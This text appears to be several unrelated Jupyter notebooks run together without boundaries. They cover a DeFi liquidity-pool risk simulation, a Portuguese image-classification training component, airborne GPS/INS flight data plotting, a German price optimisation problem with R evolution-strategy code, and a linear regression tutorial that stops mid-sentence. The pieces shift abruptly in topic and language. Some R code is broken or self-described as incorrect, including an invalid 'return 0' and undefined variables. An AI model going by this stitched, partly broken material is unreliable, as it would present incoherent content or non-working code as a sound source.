price volatility $\eta$, and estimated price volatility $\sigma$. We simplify the market environment and let the token price change follow a linear growth trend with variation, formally named the Geometric Brownian Motion (https://en.wikipedia.org/wiki/Geometric_Brownian_motion). By setting up different growth rates $r$ and volatility $\eta$, we can approximately mimic different market environments. Two metrics a liquidity provider (LP) would be very interested to know are 1) the chance of default, i.e., when the LtV >1 at any time point, and 2) Impermanent loss. We can empirically estimate the default risk and confidence intervals of impermanent loss for any given parameters by conducting Monte Carlo simulations. For simplicity, token APY are not considered for now. We set initial weights to be 50/50 and loan lifetime equals 91 days, and all key parameters various in the following parameters space: Pool parameters (1) Initial LTV: range from 0.7 to 0.95 (2) Black-scholes volatility: $\sigma$ range from 0.1 - 1.0 (3) Rebate rate of the power arbitargeur: 0 - 100% (4) Fee paid based on percentage to weights change: 0% - 1% (5) Moving average (MA) of rebalnacing weights: 1 - 30 Market enviroment (6) Growth rate: $r$ range from $[-2, 2]$ (corresponding to 25% or 200% of the initial price) (7) Growth rate volatility: $\eta$ range from 0.1 - 1.0 Episode For each parameter setup (1) to (7), we activate the CRP and monitor its performance during the whole loan life term (called an episode). At each scheduled time point t (e.g. daily), we rebalance Collateral and token according to section 5, and record and plot:1. Token price at time t 2. Reblanced weight at time t 3. LTV (pool value includes rebate and fee) 4. PVTC (pool value includes rebate and fee) 5. Scatter plot of BTC weight change and impermanent loss ratio. Each episode will be one realization of the CRP based on the selected parameters.# plot of liquity import scipy import matplotlib.pyplot as plt import matplotlib.animation from matplotlib.widgets import Slider import seaborn as sns import numpy as np import random import pandas as pd from ipywidgets import * from scipy.stats import norm #Import simulation function and class %run rbpool_env_v2.ipynb # an episode example t = np.linspace(91,0,92)/365 Real_vol = 0.5 Growth_rate = 1 LTV0 = 0.8 bs_vol = 0.5 y_price_init = 50000 Collateral = 10000000 pool_init_x = 5000000 pool_init_y = 100 pool_init_wx = 0.5 fee_rate = 0.0015 rebate=0.8 set_random_seed = True example = get_episode_full(t,y_price_init, bs_vol, Growth_rate, Real_vol, Collateral, LTV0, fee_rate, rebate, pool_init_x, pool_init_y, pool_init_wx, ma_window=3) example.head(2) # fix random seed for rw. # plot key metrics episode_plot(['y_price', 'weights_ytoken', 'ltv_with_rebate', 'pvtc_rebate', 'slippage_rebalance', 'wt_chg'])Fast AutoCV - ExperimentoEste componente utiliza o três arquiteturas presentes na biblioteca [PyTorch](https://pytorch.org/) para a tarefa de classificação de imagens. São elas: ResNet-18, ResNet-50 e VGG16. Cada uma das arquiteturas é treinada aplicando-se no conjunto de treino e validação um dos 3 conjuntos de polices genéricas definidas pelo artigo [Fast AutoAugment](https://arxiv.org/pdf/1905.00397.pdf), sujo código está disponibilizado no [GitHub](https://github.com/kakaobrain/fast-autoaugment).Ao final, o modelo de maior acurácia no conjunto de validação para o dataset utilizado será salvo para futura utilização. **Em caso de dúvidas, consulte os [tutoriais da PlatIAgro](https://platiagro.github.io/tutorials/).** Declaração de parâmetros e hiperparâmetrosDeclare parâmetros com o botão na barra de ferramentas.O parâmetro `dataset` identifica os conjuntos de dados. Você pode importar arquivos de dataset com o botão na barra de ferramentas. Para esse componente, a base de dados deve estar no seguinte formado:- Arquivo CSV chamado dataset.csv contendo as colunas "image_path", "target" e "subset", onde: - image_path: caminho para o arquivo de imagem. - target: resposta esperada da predição, caso exista. - subset: conjunto ao qual a amostra faz parte, pode ser "train", "test", e "val". - Imagens coloridas (3 canais) no formato 224x224 pixels. Caso não estejam nesse formato, o código faz as alterações necesssárias- Cada classe tem sua pasta com suas respectivas imagens, além dos conjuntos de treino, validação e teste terem suas pastas separadas. Um exemplo da árvore de diretórios pode ser observado abaixo:```bashdataset|________dataset.csv|________train| |_____class_name1| | |____image0.jpg| | |____image1.jpg| | ...| || |_____class_name2| |____image3.jpg| |____image4.jpg| ...||________val| |_____class_name1| | |____image5.jpg| | |____image6.jpg| | ...| || |_____class_name2| |____image7.jpg| |____image8.jpg| ...||________test| |_____class_name1| | |____image9.jpg| | |____image10.jpg| | ...| || |_____class_name2| |____image11.jpg| |____image12.jpg| ...```dataset = "/tmp/data/hymenoptera.zip" #@param {type:"string"} arch_list = ["resnet18", "resnet50", "vgg16"] #@param ["resnet18", "resnet50", "vgg16"]{type:"string", multiple: true, label:"Arquiteturas disponíveis para escolha.", description: "Inserir o nome das arquiteturas que deseja utilizar na busca em forma de lista."} aug_polices = ["fa_reduced_cifar10", "fa_resnet50_rimagenet", "fa_reduced_svhn"] #@param ["fa_reduced_cifar10", "fa_resnet50_rimagenet", "fa_reduced_svhn"]{type: "string", multiple: true, label: "Conjuntos de polices disponíveis.", description: "Inserir o nome dos conjuntos de polices que deseja utilizar na busca em forma de lista."} # Quantas predições queremos. # Deve ser menor ou igual ao número de classes top_predictions = 1 #@param {type:"integer", label: "Quantidade de predições desejadas", description: "Define quantas predições se quer ter de resposta para uma predição realizada pela rede. Valor máximo é igual ao número total de classes."} # variáveis utilizadas na etapa de treinamento do modelo batch = 8 #@param {type:"integer", label: "Tamanho do batch", description: "Número de amostras utilizadas em cada batch"} epochs = 1 #@param {type:"integer", label: "Número de épocas", description: "Quantidade de épocas que cada arquitetura será treinada."} lr = 0.001 #@param {type:"float", label: "Learning rate", description: "Valor do learning rate utilizado no treinamento"} gamma = 0.1 #@param {type:"float", label: "Gamma", description: "Valor de gamma utilizado na descida do gradiente"} step_size = 7 #@param {type:"integer", label: "Tamanho do passo", description: "Tamanho do passo utilizado na descida do gradiente"} momentum = 0.1 #@param {type:"float", label: "Momentum", description: "Valor do momentum utilizado na descida do gradiente"} # Variáveis globais. Evite modificá-las. ARCH_LIST = ['resnet18', 'resnet50', 'vgg16'] POLICES_LIST = ['fa_reduced_cifar10', 'fa_resnet50_rimagenet', 'fa_reduced_svhn'] CSV_FILENAME = "/tmp/data/best_models_acc.csv" checkpoint_path = "/tmp/data/models-output/" # Caminho para salvar os checkpoints dos modelos treinados output_graphs = "/tmp/data/eval-images/" # Caminha para salvar as imagens dos gráficos de loss e acurácia relativos aos treinamentosExtração de dados do arquivo .zipimport os import zipfile root_folder_name = dataset.split("/")[-1].split(".")[0] root_folder = os.path.join("/tmp/data", root_folder_name) with zipfile.ZipFile(dataset, 'r') as zip_ref: zip_ref.extractall(root_folder) os.makedirs(checkpoint_path, exist_ok=True) os.makedirs(output_graphs, exist_ok=True) dataset_id = root_folder_name # Nome base para salvar os modelosClassificação de Images# Funções auxiliares para imprimir as informações # dos modelos treinados e selecionar o melhor modelo def save_to_csv(csv_path, arch, police, val_acc): """Save a csv file with best models infos""" data = { "dataset": [dataset_id], "architecture_id": [arch], "police_id": [police], "val_acc": [val_acc]} dataframe = pd.DataFrame(data) output_path = os.path.join(csv_path, CSV_FILENAME) if os.path.isfile(output_path): dataframe.to_csv(output_path, mode="a", header=False, index=False) else: dataframe.to_csv(output_path, index=False) def best_models_stats(csv): """Print best model and all trained models""" dataframe = pd.read_csv(csv) dataframe.sort_values(by=["val_acc"], inplace=True, ascending=False) dataframe.reset_index(drop=True, inplace=True) best_cases = dataframe.loc[dataframe['dataset'] == dataset_id].head() print("### TOP 5 BEST MODELS ON {0} DATASET ###\n".format(dataset_id)) print(best_cases, "\n") print("### ALL MODELS TRAINED ON {0} DATASET ### \n".format(dataset_id)) print(dataframe.loc[dataframe['dataset'] == dataset_id], "\n") best_model = best_cases.iloc[0] return best_model import os import sys import pandas as pd import torch import torch.nn as nn import torch.optim as optim from torch import cuda from torch.optim import lr_scheduler from data import LoadData from finetuning import FineTuning from visualizations import ImageVisualization from checkpoint import Checkpoint from models import Model, ModelInfos device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(device, type(device)) multi_gpu = False if cuda.is_available(): gpu_count = cuda.device_count() print(gpu_count, ' gpus detected.') if gpu_count > 1: multi_gpu = True l_data = LoadData(root_folder) checkpoint = Checkpoint(dataset_id, multi_gpu, checkpoint_path) criterion = nn.CrossEntropyLoss() n_classes = len(os.listdir(os.path.join(root_folder, "train"))) model_ft = FineTuning(arch_list, n_classes)cpu 1. Treinamento dos modelosfor police in aug_polices: assert (police in POLICES_LIST), 'police not found' dataloaders, dataset_sizes, class_names = l_data.load_data_train(police) visual = ImageVisualization(device, dataloaders, output_graphs) for arch in arch_list: assert (arch in ARCH_LIST), 'archictecture not supported' model_train = Model(arch, device, checkpoint) model_name = "{0}_{1}_{2}".format(dataset_id, arch, police) model_path = os.path.join(checkpoint_path, model_name) if not os.path.exists(model_path): model_conv = model_ft.fine_tuning(arch) optimizer_conv = optim.SGD( model_conv.parameters(), lr=lr, momentum=momentum) exp_lr_scheduler = lr_scheduler.StepLR( optimizer_conv, step_size=step_size, gamma=gamma) model_conv, best_model_val_acc = model_train.train_model( model_conv, police, dataloaders, dataset_sizes, criterion, optimizer_conv, exp_lr_scheduler, num_epochs=epochs) save_to_csv(checkpoint_path, arch, police, best_model_val_acc) visual.visualize_results(model_conv.history, dataset_id + '_' + arch + '_' + police) elif os.path.exists(model_path): model_checkpoint = checkpoint.load_checkpoint( arch, checkpoint_path + dataset_id + '_' + arch + '_' + police) exp_lr_scheduler = lr_scheduler.StepLR( model_checkpoint.optimizer, step_size=step_size, gamma=gamma) model_checkpoint, best_model_val_acc = model_train.train_model( model_checkpoint, police, dataloaders,dataset_sizes, criterion, model_checkpoint.optimizer, exp_lr_scheduler, num_epochs=epochs) save_to_csv(checkpoint_path, arch, police, best_model_val_acc) best_model = best_models_stats(os.path.join(checkpoint_path, CSV_FILENAME)) best_model_name = "{0}_{1}_{2}".format(best_model['dataset'], best_model['architecture_id'], best_model['police_id']) best_model_path = os.path.join(checkpoint_path, best_model_name)### TOP 5 BEST MODELS ON hymenoptera-5 DATASET ### dataset architecture_id police_id val_acc 0 hymenoptera-5 resnet18 fa_reduced_cifar10 0.647059 ### ALL MODELS TRAINED ON hymenoptera-5 DATASET ### dataset architecture_id police_id val_acc 0 hymenoptera-5 resnet18 fa_reduced_cifar10 0.6470592. Teste do melhor modelomodel_path = best_model_path dataloaders, dataset_sizes, class_names = l_data.load_data_test() # Run inference for test set model = Model(best_model['architecture_id'], device) acc_per_class, confusion_mtx, report = model.predict_batch( multi_gpu, model_path, dataloaders, dataset_sizes, class_names) print("Acurácia por classe:") for i, name in enumerate(class_names): print("Class: {0} -> Acc: {1}".format(class_names[i], acc_per_class[i])) import seaborn as sns import matplotlib.pyplot as plt ticklabels = class_names ax = plt.axes() sns.heatmap((confusion_mtx/sum(confusion_mtx)), annot=True, xticklabels=ticklabels, yticklabels=ticklabels, fmt='.02%', cmap=sns.light_palette("seagreen", as_cmap=True), linewidths=0.2, ax = ax) ax.set_title('Matriz de Confusão') plt.xlabel('Classe Predita', fontsize = 15) plt.ylabel('Classe Real', fontsize = 15) plt.show() report_df = pd.DataFrame(report).transpose() report_dfSalva métricasUtiliza a função `save_metrics` do [SDK da PlatIAgro](https://platiagro.github.io/sdk/) para salvar métricas. Por exemplo: `accuracy`, `precision`, `r2_score`, `custom_score` etc.from platiagro import save_metrics import pandas as pd data = {'class': [class_names[0], class_names[1]], 'accuracy': [acc_per_class[0], acc_per_class[1]] } df_acc = pd.DataFrame(data) df_acc save_metrics(classification_report = report_df) save_metrics(accuracy_per_class = df_acc)Salva modelo e outros resultados do treinamentoEscreve todos artefatos na pasta `/tmp/data/`. A plataforma guarda os artefatos desta pasta para usos futuros como implantação e comparação de resultados.from joblib import dump artifacts = { "model_arch": best_model['architecture_id'], "dataset": best_model['dataset'], "model_police": best_model['police_id'], "model_name": best_model_name, "model_path": best_model_path, "class_names": class_names } dump(artifacts, '/tmp/data/model.joblib')GPS and INSPosition and orientation of Polar 5 and Polar 6 are recorded by an on-board GPS sensor and the internal navigation system (INS). The following example presents the variables recored by these instruments. Data access* To analyse the data they first have to be loaded by importing the (AC)³airborne meta data catalogue. To do so the ac3airborne package has to be installed. More information on how to do that and about the catalog can be found [here](https://github.com/igmk/ac3airborne-intakeac3airborne-intake-catalogue). Get dataimport ac3airborneGPS and INS data of Polar 5:cat = ac3airborne.get_intake_catalog() list(cat.P5.GPS_INS)GPS and INS data of Polar 6:list(cat.P6.GPS_INS)```{note}Have a look at the attributes of the xarray dataset `ds_gps_ins` for all relevant information on the dataset, such as author, contact, or citation information.```ds_gps_ins = cat['P5']['GPS_INS']['AFLUX_P5_RF10'].to_dask() ds_gps_insThe dataset `ds_gps_ins` includes the aircraft's position (`lon`, `lat`, `alt`), attitude (`roll`, `pitch`, `heading`), and the ground speed, vertical speed and true air speed (`gs`, `vs`, `tas`). Load Polar 5 flight phase informationPolar 5 flights are divided into segments to easily access start and end times of flight patterns. For more information have a look at the respective [github](https://github.com/igmk/flight-phase-separation) repository.At first we want to load the flight segments of (AC)³airbornemeta = ac3airborne.get_flight_segments()The following command lists all flight segments into the dictionary `segments`:segments = {s.get("segment_id"): {**s, "flight_id": flight["flight_id"]} for platform in meta.values() for flight in platform.values() for s in flight["segments"] }In this example, we want to look at a racetrack pattern during `ACLOUD_P5_RF10`.seg = segments["AFLUX_P5_RF10_rt01"]Using the start and end times of the segment, we slice the data to this flight section.ds_gps_ins_rt = ds_gps_ins.sel(time=slice(seg["start"], seg["end"]))Plots%matplotlib inline import matplotlib.pyplot as plt import matplotlib.dates as mdates import matplotlib.colors as mcolors import numpy as np import ipyleaflet from simplification.cutil import simplify_coords_idx plt.style.use("../mplstyle/book")Plot all flightsdef simplify_dataset(ds, tolerance): indices_to_take = simplify_coords_idx(np.stack([ds.lat.values, ds.lon.values], axis=1), tolerance) return ds.isel(time=indices_to_take) # define colors for the flight tracks colors = [mcolors.to_hex(c) for c in plt.cm.inferno(np.linspace(0, 1, len(cat['P5']['GPS_INS'])))] m = ipyleaflet.Map(basemap=ipyleaflet.basemaps.Esri.NatGeoWorldMap, center=(80., 6), zoom=3) for flight_id, color in zip(cat['P5']['GPS_INS'], colors): # read gps dataset of flight ds = cat.P5.GPS_INS[flight_id].to_dask() # slice to takeoff and landing times ds = ds.sel(time=slice(meta['P5'][flight_id]['takeoff'], meta['P5'][flight_id]['landing'])) # reduce dataset for plotting ds_reduced = simplify_dataset(ds, tolerance=1e-5) track = ipyleaflet.Polyline( locations=np.stack([ds_reduced.lat.values, ds_reduced.lon.values], axis=1).tolist(), color=color, fill=False, weight=2, name=flight_id) m.add_layer(track) m.add_control(ipyleaflet.ScaleControl(position='bottomleft')) m.add_control(ipyleaflet.LegendControl(dict(zip(cat['P5']['GPS_INS'], colors)), name="Flights", position="bottomright")) m.add_control(ipyleaflet.LayersControl(position='topright')) m.add_control(ipyleaflet.FullScreenControl()) display(m)Plot time series of one flightfig, ax = plt.subplots(9, 1, sharex=True) kwargs = dict(s=1, linewidths=0, color='k') ax[0].scatter(ds_gps_ins.time, ds_gps_ins['alt'], **kwargs) ax[0].set_ylabel('alt [m]') ax[1].scatter(ds_gps_ins.time, ds_gps_ins['lon'], **kwargs) ax[1].set_ylabel('lon [°E]') ax[2].scatter(ds_gps_ins.time, ds_gps_ins['lat'], **kwargs) ax[2].set_ylabel('lat [°N]') ax[3].scatter(ds_gps_ins.time, ds_gps_ins['roll'], **kwargs) ax[3].set_ylabel('roll [°]') ax[4].scatter(ds_gps_ins.time, ds_gps_ins['pitch'], **kwargs) ax[4].set_ylabel('pitch [°]') ax[5].scatter(ds_gps_ins.time, ds_gps_ins['heading'], **kwargs) ax[5].set_ylim(-180, 180) ax[5].set_ylabel('heading [°]') ax[6].scatter(ds_gps_ins.time, ds_gps_ins['gs'], **kwargs) ax[6].set_ylabel('gs [kts]') ax[7].scatter(ds_gps_ins.time, ds_gps_ins['vs'], **kwargs) ax[7].set_ylabel('vs [m/s]') ax[8].scatter(ds_gps_ins.time, ds_gps_ins['tas'], **kwargs) ax[8].set_ylabel('tas [m/s]') ax[-1].xaxis.set_major_formatter(mdates.DateFormatter('%H:%M')) plt.show()Plot time series of racetrack patternfig, ax = plt.subplots(9, 1, sharex=True) kwargs = dict(s=1, linewidths=0, color='k') ax[0].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['alt'], **kwargs) ax[0].set_ylabel('alt [m]') ax[1].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['lon'], **kwargs) ax[1].set_ylabel('lon [°E]') ax[2].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['lat'], **kwargs) ax[2].set_ylabel('lat [°N]') ax[3].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['roll'], **kwargs) ax[3].set_ylabel('roll [°]') ax[4].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['pitch'], **kwargs) ax[4].set_ylabel('pitch [°]') ax[5].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['heading'], **kwargs) ax[5].set_ylim(-180, 180) ax[5].set_ylabel('heading [°]') ax[6].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['gs'], **kwargs) ax[6].set_ylabel('gs [kts]') ax[7].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['vs'], **kwargs) ax[7].set_ylabel('vs [m/s]') ax[8].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['tas'], **kwargs) ax[8].set_ylabel('tas [m/s]') ax[-1].xaxis.set_major_formatter(mdates.DateFormatter('%H:%M')) plt.show()ProblemGegeben seien die Anzahl der fünf Produkte $\mathcal{I}$, die Gesamtmenge der Stationen $\mathcal{S}$ sowie die Tage $\mathcal{T}$ des Januars 2016. Für jedes Produkt ist am Anfang des Monats eine Menge $Q^{(i)}$ verfügbar um über den ganzen Monat verteilt verkauft zu werden. ZielZiel ist die Maximierung des Gewinns$$\Pi(q,p) = \sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}}\sum_{i\in\mathcal{i}}q_{sit}\cdot p_{sit}$$Wobei der Absatz gegeben ist durch $q_{sit}\cdot p_{sit}$ welches die Quantität aller Produkte angeboten zum Preis $p_{sit}$ darstellt. Die Nebenbedingungen sind wie folgt definierbar:\begin{enumerate} \item $\sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}} \; q_{ist} \leq Q_i \; \forall i \in \mathcal{I}$ (Offered quantity must not exceed available supply) \item $p_{ist} \leq \hat{p}_{ist} \; \forall i \in \mathcal{I}$ (Price should be the lowest possible for the $i$-th product) \item $q_{ist} \leq \hat{q}_{ist} \; \forall i \in \mathcal{I}$\end{enumerate}---Verbesserungen:* Für zu wenig verkaufte Produkte werden Kosten von $C_U$ veranschlagt. Variablen: * $c^Tx \rightarrow min$* $Ax \leq b$* $x \geq 0$wobei:* $x$: zu optimierende Variablen ($q, p$)* $c$: 1-Vektor?# lets find out if there is a correlation between price and demand df.antibiotics <- read.csv('../output/df_antibiotics_imputed.csv', row.names = NULL) df.tengu <- read.csv('../output/df_tengu_imputed.csv', row.names = NULL) df.veldspar <- read.csv('../output/df_veldspar_imputed.csv', row.names = NULL) df.nanite <- read.csv('../output/df_nanite_repair_paste_imputed.csv', row.names = NULL) df.tritanium <- read.csv('../output/df_tritanium_imputed.csv', row.names = NULL) plot(df.antibiotics$dem_avg_p, df.antibiotics$demand) plot(df.tengu$dem_avg_p, df.tengu$demand) plot(df.veldspar$dem_avg_p, df.veldspar$demand) plot(df.nanite$dem_avg_p, df.nanite$demand) plot(df.tritanium$dem_avg_p, df.tritanium$demand)---# forecasts.csv holds forecasted prices in columns prefixed with `p` # as well as forecasted demand in columns prefixed with `d` # all data is for january 2016 df.raw <- read.csv('../output/forecasts.csv', row.names = NULL) product.names <- unique(df.raw$product) print(product.names) head(df.raw) # select the data per product, then remove the product column # there are a total of five products in the data df.tritanium <- df.raw[df.raw$product == 'tritanium', ] stopifnot(dim(df.tritanium)[1] > 0) df.tritanium <- df.tritanium[, !names(df.tritanium) %in% c("product")] df.veldspar <- df.raw[df.raw$product == 'veldspar', ] stopifnot(dim(df.veldspar)[1] > 0) df.veldspar <- df.veldspar[, !names(df.veldspar) %in% c("product")] df.antibiotics <- df.raw[df.raw$product == 'antibiotics', ] stopifnot(dim(df.antibiotics)[1] > 0) df.antibiotics <- df.antibiotics[, !names(df.antibiotics) %in% c("product")] df.tengu <- df.raw[df.raw$product == 'tengu', ] stopifnot(dim(df.tengu)[1] > 0) df.tengu <- df.tengu[, !names(df.tengu) %in% c("product")] df.nanite <- df.raw[df.raw$product == 'nanite repair paste', ] stopifnot(dim(df.nanite)[1] > 0) df.nanite <- df.nanite[, !names(df.nanite) %in% c("product")] # fetch only the forecasted demand per product (also holds forecasted quantity) df.tritanium_dem <- select(df.tritanium, starts_with("d")) df.tengu_dem <- select(df.tengu, starts_with("d")) df.veldspar_dem <- select(df.veldspar, starts_with("d")) df.antibiotics_dem <- select(df.antibiotics, starts_with("d")) df.nanite_dem <- select(df.nanite, starts_with("d")) # only select positive forecasted prices/demand df.tritanium_dem_pos <- df.tritanium_dem[rowSums(df.tritanium_dem > 0) == 31,] df.tengu_dem_pos <- df.tengu_dem[rowSums(df.tengu_dem > 0) == 31,] df.veldspar_dem_pos <- df.veldspar_dem[rowSums(df.veldspar_dem > 0) == 31,] df.antibiotics_dem_pos <- df.antibiotics_dem[rowSums(df.antibiotics_dem > 0) == 31,] df.nanite_dem_pos <- df.nanite_dem[rowSums(df.nanite_dem > 0) == 31,] head(df.antibiotics_dem_pos)ESlibrary("cmaes") init.vector <- function(stations, p = NULL, q = NULL) { # creates a three-dimensional array for # (station, price + demand per day of january (62 entries)) # stations: numerical ids of stations # p: estimated price, if NULL initalized by zeros # q: estimated quantity, if NULL initalized by zeros stations.len <- length(stations) v <- rep(0, stations.len * 62) dim(v) <- c(stations.len, 2, 31) if (is.null(p)) { p <- rep(0, 31) } if (is.null(q)) { q <- rep(0, 31) } for (s in 1:stations.len) { v[s, 1, ] <- p v[s, 2, ] <- q } return(v) } # i.e. enc.veldspar <- init.vector(unique(df.veldspar$stationid)) # , q = df.veldspar_dem_pos) cost.function.flat(enc.veldspar) # implements the fitness cost.function.flat <- function(x, max.supply, max = TRUE) { # sum_s sum_t q_st * p_st o <- 0 q <- 0 stations <- dim(x)[1] # TODO: possible improvement # * weight "error" by distance in IQR of estimated demand # by accepting everything in +- 1.5 * estimated demand (as mean) # and "rejecting" everything outside for (s in 1:stations) { q = q + x[s, 1, ] o = o + sum(x[s, 1, ] * x[s, 2, ]) } if (max) { if (q > max.supply) { return 0 } return(o) } else { # minimization if (q > max.supply) { return(Inf) } return(-o) } } # kills the R session … out.veldspar <- cmaes::cma_es(par = enc.veldspar, cost.function.flat, max = FALSE, max.supply = 40000000) #, lower = rep(length(enc.veldspar), 0))Unused# unused and incorrect/incomplete # this code is per product per station! # see: http://www.scholarpedia.org/article/Evolution_strategies # x_k is a matrix in 2x31 # as per convention: # 1. row is the quantity # 2. row is the price # TODO: flatten the tensor to a vector (31 * q, 31 * d, ?) # stop criteria max.iter <- 1e-8 sigma.tolerance <- 1e-12 * sigma.init is.feasible <- function(p, p_hat, Q) { # the x vector is the first element of the individual x_k <- p_hat[1] q = x_k[1] p = x_k[2] if (!all(x_k >= 0)) { return(FALSE) } # exceeds the given supply if (sum(q) > Q) { return(FALSE) } # is in IQR of the estimated price if (!(0.5 * p_hat <= p && p <= 1.5 * p_hat)) { return(FALSE) } return(TRUE) } sort.pop <- function(pop, mu, obj.fun) { ranks <- rank(mapply(pop, FUN = obj.fun)) # TODO: resort population according to rank } # mutates one offspring mutate <- function(x, sigma, mu, rho, parents) { # select rho parents to use for recombination # if mu equals rho, the whole parent population is used if (mu == rho) { considered.pars <- parens } else { considered.pars <- sample(x = parents, size = rho) } sigma_i <- sigma_i * tao * rnorm(1,0) x <- x * sigma_i * rnorm(1, mean = 0) # TODO: mutate until the offsprings are feasible return (x, sigma_i) } # implements the fitness cost.function <- function(x_k, max = TRUE) { # sum_s sum_t q_st * p_st o <- sum(x_k[1,] * x_k[2,]) if (max) { return(o) } return(-o) } es <- function(x_0, is.feasible, cost.function, lambda = 12, mu = 6, sigma_0 = 0.5, max = TRUE, max.iter = 1000, best.fit = FALSE) { tao <- 1 / sqrt(2 * length(x_0)) # every offspring shall adhere to the order of the tuple: # (x, mutation factor, fitness) best.fit <- c(x_0, sigma_0, cost.function(x_0)) population <- rep(best.fit, mu) init.pop <- mapply(mutate, population) pop.sorted <- sort.pop(init.pop) i <- 1 while (i <= max.iter && pop.sorted[1][2] <= sigma.tolerance) { if (pop.sorted[1][3] > best.fit[3]) { best_fit <- c(pop.sorted[1][1], ) } } if (best.fit) { return best.fit } return c(pop.sorted[1]) } # unused: # evolution strategies for one product and as of now, one station lambda = 10 mu = 5 # 31 days of january N = 31 start <- matrix(c(rep(0, N)), c(rep(0, N)), ncol=N, nrow=2) # T: 31 # s: ? f <- function(x) { sum(sum(x)) } # supply numbers # tengu, nanite, antibiotics, veldspar, tritanium # b <- c(10, 40000, 1000000, 40000000, 200000000) cma_es(start, f) #, lower, upper, control=list())Introduction to Linear Regression*Adapted from Chapter 3 of [An Introduction to Statistical Learning](http://www-bcf.usc.edu/~gareth/ISL/)*||continuous|categorical||---|---|---||**supervised**|**regression**|classification||**unsupervised**|dimension reduction|clustering| MotivationWhy are we learning linear regression?- widely used- runs fast- easy to use (not a lot of tuning required)- highly interpretable- basis for many other methods LibrariesWill be using [Statsmodels](http://statsmodels.sourceforge.net/) for **teaching purposes** since it has some nice characteristics for linear modeling. However, we recommend that you spend most of your energy on [scikit-learn](http://scikit-learn.org/stable/) since it provides significantly more useful functionality for machine learning in general.# imports import pandas as pd import matplotlib.pyplot as plt # this allows plots to appear directly in the notebook %matplotlib inlineExample: Advertising DataLet's take a look at some data, ask some questions about that data, and then use linear regression to answer those questions!# read data into a DataFrame data = pd.read_csv('http://www-bcf.usc.edu/~gareth/ISL/Advertising.csv', index_col=0) data.head()What are the **features**?- TV: advertising dollars spent on TV for a single product in a given market (in thousands of dollars)- Radio: advertising dollars spent on Radio- Newspaper: advertising dollars spent on NewspaperWhat is the **response**?- Sales: sales of a single product in a given market (in thousands of widgets)# print the shape of the DataFrame data.shapeThere are 200 **observations**, and thus 200 markets in the dataset.# visualize the relationship between the features and the response using scatterplots fig, axs = plt.subplots(1, 3, sharey=True) data.plot(kind='scatter', x='TV', y='Sales', ax=axs[0], figsize=(16, 8)) data.plot(kind='scatter', x='Radio', y='Sales', ax=axs[1]) data.plot(kind='scatter', x='Newspaper', y='Sales', ax=axs[2])Questions About the Advertising DataLet's pretend you work for the company that manufactures and markets this widget. The company might ask you the following: On the basis of this data, how should we spend our advertising money in the future?This general question might lead you to more specific questions:1. Is there a relationship between ads and sales?2. How strong is that relationship?3. Which ad types contribute to sales?4. What is the effect of each ad type of sales?5. Given ad spending in a particular market, can sales be predicted?We will explore these questions below! Simple Linear RegressionSimple linear regression is an approach for predicting a **quantitative response** using a **single feature** (or "predictor" or "input variable"). It takes the following form:$y = \beta_0 + \beta_1x$What does each term represent?- $y$ is the response- $x$ is the feature- $\beta_0$ is the intercept- $\beta_1$ is the coefficient for xTogether, $\beta_0$ and $\beta_1$ are called the **model coefficients**. To create your model, you must "learn" the values of these coefficients. And once we've learned these coefficients, we can use the model to predict Sales! Estimating ("Learning") Model CoefficientsGenerally speaking, coefficients are estimated using the **least squares criterion**, which means we are find the line (mathematically) which minimizes the **sum of squared residuals** (or "sum of squared errors"): What elements are present in the diagram?- The black dots are the **observed values** of x and y.- The blue line is our **least squares line**.- The red lines are the **residuals**, which are the distances between the observed values and the least squares line.How do the model coefficients relate to the least squares line?- $\beta_0$ is the **intercept** (the value of $y$ when $x$=0)- $\beta_1$ is the **slope** (the change in $y$ divided by change in $x$)Here is a graphical depiction of those calculations: Let's use **Statsmodels** to estimate the model coefficients for the advertising data:# this is the standard import if you're using "formula notation" (similar to R) import statsmodels.formula.api as smf # create a fitted model in one line lm = smf.ols(formula='Sales ~ TV', data=data).fit() # print the coefficients lm.paramsInterpreting Model CoefficientsHow do we interpret the TV coefficient ($\beta_1$)?- A "unit" increase in TV ad spending is **associated with** a 0.047537 "unit" increase in Sales.- Or more clearly: An additional $1,000 spent on TV ads is **associated with** an increase in sales of 47.537 widgets.Note that if an increase in TV ad spending was associated with a **decrease** in sales, $\beta_1$ would be **negative**. Using the Model for PredictionLet's say that there was a new market where the TV advertising spend was **$50,000**. What would we predict for the Sales in that market?$$y = \beta_0 + \beta_1x$$$$y = 7.032594 + 0.047537 \times 50$$# manually calculate the prediction 7.032594 + 0.047537*50Thus, we would predict Sales of **9,409 widgets** in that market.Of course, we can also use Statsmodels to make the prediction:# you have to create a DataFrame since the Statsmodels formula interface expects it X_new = pd.DataFrame({'TV': [50]}) X_new.head() # use the model to make predictions on a new value lm.predict(X_new)Plotting the Least Squares LineLet's make predictions for the **smallest and largest observed values of x**, and then use the predicted values to plot the least squares line:# create a DataFrame with the minimum and maximum values of TV X_new = pd.DataFrame({'TV': [data.TV.min(), data.TV.max()]}) X_new.head() # make predictions for those x values and store them preds = lm.predict(X_new) preds # first, plot the observed data data.plot(kind='scatter', x='TV', y='Sales') # then, plot the least squares line plt.plot(X_new, preds, c='red', linewidth=2)Confidence in our Model**Question:** Is linear regression a high bias/low variance model, or a low bias/high variance model?**Answer:** High bias/low variance. Under repeated sampling, the line will stay roughly in the same place (low variance), but the average of those models won't do a great job capturing the true relationship (high bias). Note that low variance is a useful characteristic when you don't have a lot of training data!A closely related concept is **confidence intervals**. Statsmodels calculates 95% confidence intervals for our model coefficients, which are interpreted as follows: If the population from which this sample was drawn was **sampled 100 times**, approximately **95 of those confidence intervals** would contain the "true" coefficient.# print the confidence intervals for the model coefficients lm.conf_int()Keep in mind that we only have a **single sample of data**, and not the **entire population of data**. The "true" coefficient is either within this interval or it isn't, but there's no way to actually know. We estimate the coefficient with the data we do have, and we show uncertainty about that estimate by giving a range that the coefficient is **probably** within.Note that using 95% confidence intervals is just a 